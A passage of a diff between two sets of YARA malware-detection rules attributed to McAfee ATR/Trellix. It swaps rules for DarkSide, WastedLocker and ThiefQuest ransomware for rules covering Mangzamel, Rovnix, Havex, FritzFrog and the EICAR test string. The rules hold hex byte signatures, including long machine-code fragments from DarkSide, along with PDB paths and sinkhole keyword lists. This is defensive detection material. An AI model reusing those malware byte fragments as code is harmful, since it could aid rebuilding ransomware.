ff15???????? } + $pdb = "\\c0da\\j.pdb" condition: - 7 of them and filesize <237568 + uint16(0)==0x5a4d and filesize <400KB and any of them } -rule TRELLIX_ARC_RANSOM_Wastedlocker : RANSOMWARE FILE +rule TRELLIX_ARC_Malw_Mangzamel_Trojan : TROJAN FILE { meta: - description = "Rule to detect unpacked samples of WastedLocker" - author = "McAfee ATR Team" - id = "900923cf-75c0-5342-858d-fe1ffa9486bd" - date = "2020-07-27" - modified = "2020-10-12" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_wastedlocker.yar#L1-L32" + description = "Rule to detect Mangzamel trojan based on PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "ca77180f-6133-5edb-a36b-78bc6f18d80c" + date = "2014-06-25" + modified = "2020-08-14" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_mangzamel_trojan_pdb.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "c5adf88a46c34c8683d0e3d70529b352c77209f004e6c638ff079ea025921781" + hash = "4324580ea162a636b7db1efb3a3ba38ce772b7168b4eb3a149df880a47bd72b7" + logic_hash = "bab103c671445e0ea916fae290689d30d45021bdca58a495ebd3d6ca9ca55051" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "TROJAN, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/WastedLocker" + malware_type = "trojan" + malware_family = "Trojan:W32/Mangzamel" actor_type = "Cybercrime" actor_group = "Unknown" - hash1 = "ae255679f487e2e9075ffd5e8c7836dd425229c1e3bd40cfc46fbbceceec7cf4" strings: - $pattern_0 = { 8d45fc 50 53 53 6a19 ff75f8 } - $pattern_1 = { 66833b00 8bf3 0f8485000000 8b7d10 8b472c 85c0 7410 } - $pattern_2 = { e8???????? 8b4d08 8b4518 8d0441 6683600200 83c40c 837d1400 } - $pattern_3 = { 8701 e9???????? 8bc7 5f 5e 5b } - $pattern_4 = { 8bf8 3bfb 742f 53 8d45fc 50 56 } - $pattern_5 = { 6a10 8d45f0 6a00 50 e8???????? 83c40c 5e } - $pattern_6 = { 5f 5d c20800 55 8bec } - $pattern_7 = { 8d7e04 ff15???????? 85c0 8945e8 740e 2b4510 } - $pattern_8 = { ff15???????? 8b45dc 8b4dbc 69c00d661900 055ff36e3c 8945dc } - $pattern_9 = { 8b4d08 8b19 03d8 f7d0 c1c60f 03f2 0bc6 } + $pdb = "\\svn\\sys\\binary\\i386\\agony.pdb" + $pdb1 = "\\Windows\\i386\\ndisdrv.pdb" condition: - 7 of them and filesize <1806288 + uint16(0)==0x5a4d and filesize <360KB and any of them } -rule TRELLIX_ARC_MALW_Thiefquest : KEYLOGGER BACKDOOR RANSOMWARE FILE +rule TRELLIX_ARC_Rovnix_Downloader : DOWNLOADER { meta: - description = "Rule to detect the Evilquest/ThiefQuest malware" - author = "McAfee ATR Team" - id = "09b074f7-6899-574d-a7d6-4414509aaa78" - date = "2020-07-09" - modified = "2020-10-12" - reference = "https://www.bleepingcomputer.com/news/security/thiefquest-ransomware-is-a-file-stealing-mac-wiper-in-disguise/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_thiefquest.yar#L1-L46" + description = "Rovnix downloader with sinkhole checks" + author = "Intel Security" + id = "d51f8f73-7a3a-5ccf-9122-86061b5399f1" + date = "2024-09-01" + modified = "2020-08-14" + reference = "https://blogs.mcafee.com/mcafee-labs/rovnix-downloader-sinkhole-time-checks/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_Rovnix.yar#L1-L38" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b" - logic_hash = "d40a466b12188d545d3fbe2c9d7e3685dde1250ae1f25df2a72cdf93c470ae25" + logic_hash = "52cde40c95436129b7d48b4bd5e78b66deb84fdc84a76cc9ac72f24e0777e540" score = 75 - quality = 68 - tags = "KEYLOGGER, BACKDOOR, RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "keylogger, backdoor, ransomware" + quality = 43 + tags = "DOWNLOADER" + malware_type = "downloader" + malware_family = "Downloader:W32/Rovnix" actor_type = "Cybercrime" - malware_family = "Ransom:OSX/ThiefQuest" + actor_group = "Unknown" strings: - $pattern_0 = { 01c1 48 83c102 48 } - $pattern_1 = { 8c1471 80c1c1 98 1c8c } - $pattern_2 = { d8974f0dc89a 9f c9 9adf70cd595390 } - $pattern_3 = { d897c56f028c 2393a0a42e92 8ea2c27affc2 f8 } - $pattern_4 = { 477006 baa6a1cb82 ae f9 e8???????? d8a32bd0d519 } - $pattern_5 = { d898ab5c757b 2f f26f 5d } - $pattern_6 = { bc007a846b 2b54adaf 93 35eddf38e6 cdd0 b246 } - $pattern_7 = { ae 49b00e 01d1 45da611b 44839db656691674 } - $pattern_8 = { 01c1 48 83c101 48 } - $pattern_9 = { 6be3c6 5c 99 ae ed bf370e2f47 } - $pattern_10 = { fd d7 43bd18fd6f06 7937 fa } - $pattern_11 = { 01c2 48 83c201 bf01000000 } - $pattern_12 = { d89825ed4469 29f1 5c e12d } - $pattern_13 = { d8992062f7f9 73ff 90 085fc6 } - $pattern_14 = { 01c1 6689ca 668995cefeffff e9???????? } - $pattern_15 = { 01c1 41 89c8 44 } - $pattern_16 = { d89935c487a7 bcdffa587c be6cadbb3c 185fc4 } - $pattern_17 = { 01c1 48 8b75a8 48 } - $pattern_18 = { 0000 48 8945f8 e9???????? } - $pattern_19 = { d89959d6472d a2???????? 3525c7eec9 95 } - $pattern_20 = { 01c2 48 83c203 bf01000000 } - $pattern_21 = { 4a7888 ab 23e7 cf 11f3 } - $pattern_22 = { d8982fbf222d 49 92 1d25b42bba } - $pattern_23 = { e2d7 8437 6b4696d9 92 9d a6 } + $sink1 = "control" + $sink2 = "sink" + $sink3 = "hole" + $sink4 = "dynadot" + $sink5 = "block" + $sink6 = "malw" + $sink7 = "anti" + $sink8 = "googl" + $sink9 = "hack" + $sink10 = "trojan" + $sink11 = "abuse" + $sink12 = "virus" + $sink13 = "black" + $sink14 = "spam" + $boot = "BOOTKIT_DLL.dll" + $mz = { 4D 5A } condition: - 7 of them and filesize <124322606 + $mz in (0..2) and all of ($sink*) and $boot } -rule TRELLIX_ARC_RANSOM_Darkside : RANSOMWARE FILE +rule TRELLIX_ARC_Malw_Eicar : EICAR { meta: - description = "Rule to detect packed and unpacked samples of DarkSide" + description = "Rule to detect the EICAR pattern" author = "Marc Rivero | McAfee ATR Team" - id = "ecbee92f-236a-5385-9566-502ef1c0aeda" - date = "2020-08-11" - modified = "2023-07-27" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Darkside.yar#L1-L23" + id = "16307b03-7fab-5d68-ad3b-0efcea952fcf" + date = "2024-09-01" + modified = "2020-08-14" + reference = "https://www.eicar.org/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_Eicar.yar#L1-L22" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "be16d65911336809be103ea667167228e6445de85fd47ecd9ff8b3d91e056693" + hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f" + logic_hash = "564b0592f40582fe71e2dab0c0f25c168462f9297c13e7c9f06ac51b492e4533" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "EICAR" + malware_type = "eicar" + malware_family = "W32/Eicar" + actor_type = "Unknown" + actor_group = "Unknown" + + strings: + $s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii + + condition: + any of them +} +rule TRELLIX_ARC_Havex_Backdoor_Pdb : BACKDOOR FILE +{ + meta: + description = "Rule to detect backdoor Havex based on PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "a667bb4e-8c38-59a6-8ae0-09c44961a687" + date = "2012-11-17" + modified = "2020-08-14" + reference = "https://www.f-secure.com/v-descs/backdoor_w32_havex.shtml" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_backdoor_havex_pdb.yar#L1-L26" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "0f4046be5de15727e8ac786e54ad7230807d26ef86c3e8c0e997ea76ab3de255" + logic_hash = "dc50475b1ff2194306a0295f71860e4cc5ae7e126daa5d401b98cd2a0aadf1dd" + score = 75 + quality = 70 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/DarkSide" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Havex" actor_type = "Cybercrime" actor_group = "Unknown" - hash1 = "9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297" strings: - $pattern_0 = { CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558BEC5053515256570FEFC0660FEFC033DB8B7D088B450C33D2B910000000F7F185C0740B0F110783C7104885C075F585D27502EB5892B908000000F7F185C0740B0F7F0783C7084885C075F585D27502EB3B92B904000000F7F185C0740A891F83C7044885C075F685D27502EB1F92B902000000F7F185C0740B66891F83C7024885C075F585D27502EB02881F5F5E5A595B585DC20800558BEC5053515256578B750C8B7D088B451033D2B910000000F7F185C074110F10060F110783C61083C7104885C075EF85D27502EB6892B908000000F7F185C074110F6F060F7F0783C60883C7084885C075EF85D27502EB4592B904000000F7F185C0740F8B1E891F83C60483C7044885C075F185D27502EB2492B902000000F7F185C0740E66891F83C60283C7024885C075F285D27502EB048A1E881F5F5E5A595B585DC20C00558BEC53515256578B4D0C8B75088B7D1033C033DBAC8AD8C0E80480E30F3C0072063C09770204303C0A72063C0F7702045780FB00720880FB09770380C33080FB0A720880FB0F770380C35766AB8AC366AB4985C975BE6633C066AB5F5E5A595B5DC20C00558BEC53515256578B75088B7D0C55FCB2808A0683C601880783C701BB0200000002D275058A164612D273E602D275058A164612D2734F33C002D275058A164612D20F83DB00000002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C002D275058A164612D213C074068BDF2BD88A03880747BB02000000EB9BB80100000002D275058A164612D213C002D275058A164612D272EA2BC3BB010000007528B90100000002D275058A164612D213C902D275058A164612D272EA568BF72BF5F3A45EE94FFFFFFF48C1E0088A06468BE8B90100000002D275058A164612D213C902D275058A164612D272EA3D007D000083D9FF3D0005000083D9FF3D8000000083D1003D8000000083D100568BF72BF0F3A45EE9FEFEFFFF8A064633C9C0E801741783D1028BE8568BF72BF0F3A45EBB01000000E9DDFEFFFF5D2B7D0C8BC75F5E5A595B5DC20800558BEC53515256578B7D088B450CB9FF00000033D2F7F185C074188BD868FF00000057E8AD00000081C7FF0000004B85DB75EA85D274075257E8970000005F5E5A595B5DC20800558BEC5351525657B9F0000000BEB2B640008B45088B108B58048B78088B400C89540E0C89440E08895C0E04893C0E81EA101010102D1010101081EB1010101081EF1010101083E91079D533D233C98B750C33DB8B7D108A81B2B6400002141E02D08AA2B2B64000438882B2B6400088A1B2B640003BDF7306FEC175DAEB0633DBFEC175D25F5E5A595B5DC20C00558BEC535152565733C0A3C2B84000A3C6B84000B9400000008D35B2B640008D3DB2B74000F3A58B7D088B15C2B840008B4D0C8B1DC6B840004F33C0029AB3B740008A82B3B740008AABB2B740008883B2B7400088AAB3B7400002C5478A80B2B74000FEC23007FEC975D18915C2B84000891DC6B840005F5E5A595B5DC2080053515256578D35047040008D3DCAB84000FF76FC56E891FEFFFF56E8864500008BD8FF76FC56E888FBFFFF8B46FC8D3406B915000000E85C010000AD5056E868FEFFFF56E85D4500008BD8FF76FC56E85FFBFFFF8B46FC8D3406B93D000000E833010000AD5056E83FFEFFFF5256E8334500008BD85AFF76FC56E834FBFFFF8B46FC8D3406B915000000E808010000AD5056E814FEFFFF5256E8084500008BD85AFF76FC56E809FBFFFF8B46FC8D3406B904000000E8DD000000AD5056E8E9FDFFFF5256E8DD4400008BD85AFF76FC56E8DEFAFFFF8B46FC8D3406B906000000E8B2000000AD5056E8BEFDFFFF5256E8B24400008BD85AFF76FC56E8B3FAFFFF8B46FC8D3406B901000000E887000000AD5056E893FDFFFF5256E8874400008BD85AFF76FC56E888FAFFFF8B46FC8D3406B903000000E85C000000AD5056E868FDFFFF5256E85C4400008BD85AFF76FC56E85DFAFFFF8B46FC8D3406B901000000E831000000AD5056E83DFDFFFF5256E8314400008BD85AFF76FC56E832FAFFFF8B46FC8D3406B902000000E8060000005F5E5A595BC3ADFF76FC56E80AFDFFFF515653E8F743000059ABFF76FC56E8FFF9FFFF8B46FC8D34064985C975D8C3558BEC81EC1401000053515256578D85ECFEFFFF50FF1516B940008BB5F0FEFFFF8BBDF4FEFFFF83FE05750583FF01720583FE057313B8000000005F5E5A595B8BE55DC3E9DA00000083FE05751883FF017513B8330000005F5E5A595B8BE55DC3E9BD00000083FE05751883FF027513B8340000005F5E5A595B8BE55DC3E9A000000083FE06751785FF7513B83C0000005F5E5A595B8BE55DC3E98400000083FE06751583FF017510B83D0000005F5E5A595B8BE55DC3EB6A83FE06751583FF027510B83E0000005F5E5A595B8BE55DC3EB5083FE06751583FF037510B83F0000005F5E5A595B8BE55DC3EB3683FE0A751485FF7510B8640000005F5E5A595B8BE55DC3EB1D83FE0A750583FF00770583FE0A760EB8FFFFFF7F5F5E5A595B8BE55DC3B8FFFFFFFF5F5E5A595B8BE55DC3558BEC83C4F853515256576A0068800000006A026A006A006800000040FF7508FF1526B940008945FC837DFCFF74226A008D45F850FF7510FF750CFF75FCFF1536B9400085C07409FF75FCFF153EB940005F5E5A595B8BE55DC20C008BFF558BEC5351525657837D0C0074728D3DAABA4000837D100075086A1057E842F8FFFFFF750CFF750868EFBEADDEFF15F6B84000FF750CFF750850FF15F6B840003107FF750CFF750850FF15F6B84000314704FF750CFF750850FF15F6B84000314708FF750CFF750850FF15F6B8400031470CB8AABA40005F5E5A595B5DC20C00B8000000005F5E5A595B5DC20C00558BEC5351525657FF7508FF15DEB8400083C4048BD88D045D02000000506A00FF35AEB64000FF15BEB940008BF085F67434FF750856FF15CEB8400083C4088D43016A006A0050FF75086AFF566A006A00FF1506BA4000566A00FF35AEB64000FF15C6B940008BC35F5E5A595B5DC2040053515657833DBABA400000750B68BABA4000FF15F2B8400068BABA4000FF15F2B840008BD15F5E595BC3558BEC5351525657BB080000008B7508E8C1FFFFFF83FB05750433C033D28944DEFC8954DEF84B85DB75E55F5E5A595B5DC204008D4000558BEC81EC0001000053515256578D45B083C00F83E0F089850CFFFFFF8D8560FFFFFF83C00F83E0F0898508FFFFFF8D8510FFFFFF83C00F83E0F0898504FFFFFF837D14000F84750300008BB504FFFFFF0F57C00F11060F1146100F1146200F1146308B75088BBD0CFFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F30837D1440732A8B4510898500FFFFFF8B9504FFFFFF8BFA8B750C8B4D148A440EFF88440FFF4985C975F389550C8955108BB50CFFFFFF8BBD08FFFFFF0F10060F104E100F1056200F105E300F11070F114F100F1157200F115F305556BD0A0000008B078B5F108B4F208B57308BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C68907895F10894F208957308B47148B5F248B4F348B57048BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894714895F24894F348957048B47288B5F388B4F088B57188BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C6894728895F38894F088957188B473C8B5F0C8B4F1C8B572C8BF003F2C1C60733DE8BF303F0C1C60933CE8BF103F3C1C60D33D68BF203F1C1C61233C689473C } - $pattern_1 = { 70211F3B6E97C50000473D000000A000004602003EBBFF1F92CC558BEC5053515256570FEFC0660333DBFBFFEDFF8B7D088B450C33D2B9100000F7F185C0740B0F110783C710480A692EFB7F75F585D27502EB5892B9081C7F08B60F592E3B040A891F38049B641979F61F02661CD6FEBFEC023802881F5F5E5A595B585DC25D977E20634F8B750C9110110F1006252383FD94C61097EF6819AC59BA226F7F089DEFD8EE0119450F8B1E82C604A23E033232F1240EC602B9EC91C1A5F2048A1EA70CA12CCBD9A64D757D42E9FEFFBFAC8AD8C0E80480E30F3C0072063C09770204303C0A090FB66F6DBB5780FB140804150380C3300C0ADADFFE790F5766AB8AC3034985C975BE6646FF252CD6096564610C55FCB2806FDF86DB8A069701887801BBAD0299058A164FD62EFB4612D273E60A4F430C0F83DB7F2A7B602613C00A74068BDF2BD821EC63DB8A03644762EB9BB80142900BFBFB72EA2BC3BB1C7528B923C96F7FFB1F568BF72BF5F3A45EE94D01D248C1E008C3468BE8DE1EC26E0C0449303D007D4B83D9FF0DD93CD907058000D100BDB01BF250F04C33C974017417B1D8B0B61902561B96204B06E1C25D2B398BC75208111AEE18EDB9FF2660F4F8EFDDF7188BD8680E579B03D981C70B4B85DB75EAEE94CD5EFE7407521546B9F0256F7F6BB7BE02A6B24D50108B58048B7807400C895FF7FFDB540E03440E08895C0E04893C0E81EA10002D048168ED9FB1EB05EF83E91079D57EC0DFFFFDE4EC80108A814A02141E02D08AA20A436BFFBFDF88820688A1053BDF7306FEC175DAEB062C076E0B29A3D227F8A327A8C27DFBEDFE04C6B940998D35378D3D05A7B2F3A57DBC8FF7F31520B41D242A9A1BFB8DDD1CB38A8205AB28888305AA11D88DFFFE02C5478A800EFEC23007FEA0D189402F9684D8893D0D7C6BF07BF8CF6004A8CAFF76FC5630040549FF33FFDBAC59109C0C8B46FC8D3406B9150F477291BD05F0AD50283D52C252D961295A532A02B902BB04550608B902B90103E10843260299C3AD8615B2BF2751565333F959AB329FE0EEF874D8C33F81EC1468C885ECFE7777DFF0FFFF50FF4FA9168BB5F00C8BBDF40583FE055877F74BA483FF017205097313B86D00695BF36DFA8BE55DC36C073C2118751C3300D21C210234DF04D2FD06751785FF1B3C1555109AC11EC8B83DEB6A19023EA419644250033FC866DE2636690A75141864FECDEE4C1DDE00770A760EB8FFFFFF7F1B927C490DFF3083C4AEFD7A84F82D6A0068976A02080AFE8FB07509405A083B268945FC837DFCFF7422916D73DF188D45F85072020C1DFC34ECB0AE3672090C3E59746B43DACC8BFFCE3C0D7472E1AD44FB51AAAA0B04576A1057BC67BF3F16470868EFBEADDE3FA8F6105090BDB0670C31070E47040F92F50EC9080CB8624E071B5913D85CD6A8DE6D1FDF6AF9E4D88D045D6D50DAFF58F78F7D63AEC6BE8BF085F6743429562ADDDCE1CBCE088D430119FDBDFF56B027ECEF0A1AAA065639C68BC37077FB9C630484FAF4BAF10B6807A31DB0B14CF20A8BD12DE09A3871989ABBFD24E84013CB376608A783FB048DD2D90317B87FDEFC87DEF8C4E55D49C628308D17EE000DC32FF145B083C027E0F089850CE3FD202387B960051108102B99FE37040B7D14000F8475C41E0FA6DBC5F60F571C119846100320ED17EF8930B1BD4EB0104E17D32CDBCB1056105E3026074F57CDE6E26E5F304840732AE457008B6FF017BF954D8BFAFB4D148A3FFF88447B6DFBD30FFFA3F389550C02106E5359FDF0A964085556BD0A14078B5F6FFFDFBE354F208B5792F003F2C1C60733DE8BF303F0080933CEED2FFFF28BF103F30D33D68BF203F11233C68907892ECBB26D96898947143A243404CBD612202F3B24342CCBB22C0428380818CBB25C802838081820CBB22C3C0C1C2CDFB22C173C0C1C2CED0463476063760CED04750C53606363ED187510ED18D80863637510ED2C6424ED3036C2142C6524ED30234C818D6538ED3065386DA30DFC4D85ED0F851B975E5DF30702CBE5726BC80357105F1867206FB6022F972877307F380F0C024EE572B9DC1EFE56FE5EFE66FE6EA6D996CBFE76FE7E7F3D7F7F94A6699A7F7F7F7F7F9AE5C8708D6B5757575D8C966B57BED8FE2011BFE4B834118B9DA7274320837B2086F1B195000824E977EF1866C335DB32C500E4B2BD154E8B55BA338942200524B5655BFA24EB16831940030C6D370297C0237485CAFC86C21297EE1A818880308D7D80F3B920B16FE21DF2F3ABB900DF518D7580F810CD33E7FED1168D7604E2F92175128B06194DA6ECED078D7F17F473181911C9600933C441290CD5BB0A5B5B59F033E476B05505E00CEDAA9BBDB266E03AA5D908A6BFB960DDDFFCDD4FE0C64580018BA98F7EF05D0C81C379B981A849B1BE07D84150F8510851FC8DAB8360115F547B8D626FADBB1D508D3B50E874D3815240D3E0BF6563F02203740F9908199BBB4B1961646306AE9B780C830627307DC7E63041B73BDB06F8410ECB8A369391B8D51A68A41F000B8278E2C406CE1F0926023676729008AA12F80C1A24446B4B22170E54206317F226F8C37EF45B18B8C3F8EF238B71C65E4E62F475F8F46A0514066C737F01CE04EB43EB3F3D310A1B1CB5D84CD837C2EBC60D2C5A839117A1C12C4468F7BBA5196AD2C86AD6616CDBD8288E2E33ED3CAD1D14C3999178FF733C02CA74D72E71A1A14402EBFC1C332275D4565858CA5D4F846D35570F06E6AC62895FE9BF454B183B480875278D1F30AABEC220586C3BEA0F2C3A0E186BD5E850C63826070017E40793C5F30C0262CC0D776B110D6F68081017F4FDDD58B2C77568040110976256A3D8B3C4B2CC11D3D23DE2DB4636F677FC57FB571F34102048BC03A1088DA3ADD5456CD8C2BE227A30C3A3B18D922A9B1C2C6A9BDB095B62106E38E18B5E12C37BD86CB0403753132F6E56A573B367B10FBC59A8EE97CD409E848530675464A1183064849F924030C31A2C72E1248313F88D1DCF6C125B166CECFC53EC531BB519E4027936286BC0D263936C0F6A245FD4C70B24B15766738C09E89B4A2C585392A89C53325426816407AA7E5111040C8D9913E810EF52A937B527344930AA660C5E017648727CC960E3F07304ADA50B27ACDB8F2D60F0B5833EAF15107A641F05D019EBCCCBACDD2578763D4FA9744A4A0FFC0618E9E3147A6517C1293AECB517D9F88B122E0146336C2CD67D7C5224760B1D0E08506FC8096E7ACA96504FB6B1B1463FD3A6521911F424E1FC5A0142A91AD9A722EC3EEE6B18B26B1C3D7DB1D75EAFFC8D7531831C8535BF8E68EB803FAA5219367958D984534FBE3C1B690664B0B03CCC09209966A401B44050C83336C9ECA29D0004D88465B109215A244576CF58C96AF0346AF4AE9D3DB360BC0E3989C005A9247508F153A7A564036F644553F675A3D4253BAC3956120C5AEBE66EC682D922722568F4C058B36FD730DAEDB57D14450DAA0BD716168151969EAE69921D76C8D85E08626E130C9C11C00D07C160C7846481EDFF72C8A1BDE3DF9F813C18DEADBEEF980340EBF2C631F9EC4E04136DA456A4A1FC8EAC7E73C8C1E0068BD82373CCBB46C6DE01B16A1630408086A44CB2810B2C2F3616500A17F3DE5F0BAB8EAEA556561FFBE5B2F6150A374D358D83E6070A67B303593A5A56223D5A89E4C8254EB60FE492B3D95E56223D5E4FD9EC447286176256223D223972C96250561FB9E46C766656223D6641363B911C26276A56223D488E5C726A51F62E72362B90C7223D6E9D488E5C52C6367256472E399B223D724B963E9CCD4E247656223D7627922397537E427A56964BCE66223D7A545890672269727E72CCA759E47E0AC8A912678203C11A01B23557FBC2E08A53D968243106BE91ACB86472A8C319698152773D833C038C907C420BB3345B061008091C095EE251887010EBDE251B5A160CE0FD66B80904A10B9566ABE74C161266A4D19EE614ECA72DE3F8DC0F84A129461DF421D89E3DE828139F83DA062D4FEEF350ECD3AEFCF6EB6399F833D285D255B390DB6BFDC90530940107A842EB14BB162E2CC12B8B1BD4CB4D33C9192BFFAE400830040E4183F9080E04AC5F713904576A57014C7042E2C8681122C63664F381D8ED9E70B470B8182C883DA58E0EFFE62C080B5B180C256C469348D2C1B408AC1CEC840704300A44AA0EBBB6044381DC0C4BA62EEA1D487CDA4AE10E58D4DC194871F43A5F5DB37064FBF086F034798B83C9A26B096057B0571E7F83172666FD47FE5CFA66C704475C00D565F15702444702D9EB3D62598B151A11EA0B3531B614F06592BA0E46348A5D3932DAC81B1A386C90410C03802C26E0B1CCCD19502B1B035C4379AA3ACD09D534968523BBEB6953CCECBFEC511DB68B27C8F4CB75EC39326FD94ED2820BEB1E27F41821E12E7548293B02750759AC12C23B9616FF57C6082997A5EC1C846C4EC80C6D026D0630968DE46D06251CA43358A41AF84F9CD06CEBA91B5C107EDA562CE1F7C049A5AE83702B0CCB523367A364CD46000B08DD35AD8C91877A08E63C5798CC25C3AC9C86AD927DC615A3A3DC53E7CA217946B6431A1010E864489E911414F0183891906718F8A44D6148561EEBA0D3363ACC9DD08BC8C45110BA36D092BA42CE140510960626A37C49D0736C658C67F0524156E89E609103 } + $pdb = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Phalanx-3d.ServerAgent.pdb" + $pdb1 = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Tmprovider.pdb" condition: - $pattern_0 or $pattern_1 and filesize <5831344 + uint16(0)==0x5a4d and filesize <500KB and any of them } -rule TRELLIX_ARC_RANSOM_Darkside_DLL_May2021 : RANSOM FILE +rule TRELLIX_ARC_MALW_Fritzfrog : BOTNET FILE { meta: - description = "Rule to detect Darkside Ransomware as a DLL" - author = "TS @ McAfee ATR" - id = "e9d64637-dc8f-5650-81e1-34e27e6ee912" - date = "2021-05-14" - modified = "2023-07-27" + description = "Rule to detect Fritzfrog" + author = "Marc Rivero | McAfee ATR Team" + id = "4c553279-7e0c-5602-944d-ad8a47edf4ea" + date = "2020-08-20" + modified = "2020-08-20" reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Darkside.yar#L26-L47" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_fritzfrog.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "f587adbd83ff3f4d2985453cd45c7ab1" - logic_hash = "39930b6f352642647ea6b80f941201b93d6a9defd42cb75f9e4f7239ff17a4ec" + logic_hash = "488c807ecf0a9e981b2c1f2f5bb2e3072952d11f7cbf3a354bc85dc8e88b8b09" score = 75 quality = 70 - tags = "RANSOM, FILE" - rule_type = "Public" + tags = "BOTNET, FILE" rule_version = "v1" - malware_type = "Ransom" + malware_type = "botnet" + malware_family = "Botnet:W32/Fritzfrog" + actor_type = "Cybercrime" + hash1 = "103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $s1 = "encryptor2.dll" wide ascii - $s2 = "DisableThreadLibraryCalls" wide ascii - $s3 = "KERNEL32.dll" wide ascii - $pattern1 = {D24DC8855EDD487B3CD2D545F11031E1FA85C2F2440712445F67D105B326533A77BA75B3383A98CE97EAA2B95798DCFA6B75B5573662F9ED5DC9B7D2E582FD94104E210F3EA62A1826B26B952FFBD5A70A97E6EC3D14794577A2980A0ED1EE02CA291623DD3721A7E68223EDA56F9E1325FE36E191D5C41F7227D55EDC3D5B9359C819} - $pattern2 = {87FC982E066F585B73D417C0D5F75B86B9F9F8286B4CC42BB2053912D595A68C07C0EDD0159AC785880C5483E246D3501F6523D05078B9B7510711423948D4CB367C83C0833BD04AD6DC655E1BEEA38770470BB48B6EBA70944E952526E4D87A03BAA485D7B4DA1318A00EF07FA76C0D} - $pattern3 = {1B6F099F1C3C62BBF5543FA03B919C7BF5E477D256CE79D98C55ACE8D69CDC9373B2F0A2B51414776D5226B74BF9A7CB935C9DD04BCFC19FC81418F7A39244A730697E1BC05418BF41DE50E4C8609533591CE80617D476E686B36CF2AE914CB3AFD720A33C0D5DE438F1CD0B} - $pattern4 = {5060E373F1D3B3BB8D15C851BBFC73F60390681C488F7C0B80FC2EDBC1ED88CEA82014B9223A70EA0BB7DD0D2560A29D39381FEE7B73AE22683AE05C369918F8C5772678A9F29CEF65854238D1C2B762CC12706637154F57A9} - $pattern5 = {EE452560DBD5A4F46FB562C9C707C8D014BB8F1C18E4467E249F5AC69A87954F5B69650B7A759CE2DD075E99CBCBA37A9C5A0650EDF06285F8F990AF6B94FBA08E3C0B2EBDE3C155ECDB06C30F95D76695} + $pattern = { 7F454C4602010100000000000000000002003E000100000090D34500000000004000000000000000C8010000000000000000000040003800070040000D000300060000000400000040000000000000004000400000000000400040000000000088010000000000008801000000000000001000000000000004000000040000009C0F0000000000009C0F4000000000009C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000083F23E000000000083F23E00000000000010000000000000010000000400000000003F000000000000007F000000000000007F00000000006C834500000000006C834500000000000010000000000000010000000600000000908400000000000090C400000000000090C4000000000060EC0400000000005809070000000000001000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000006000000000000000010400000000000001000000000000083E23E0000000000000000000000000010000000000000000000000000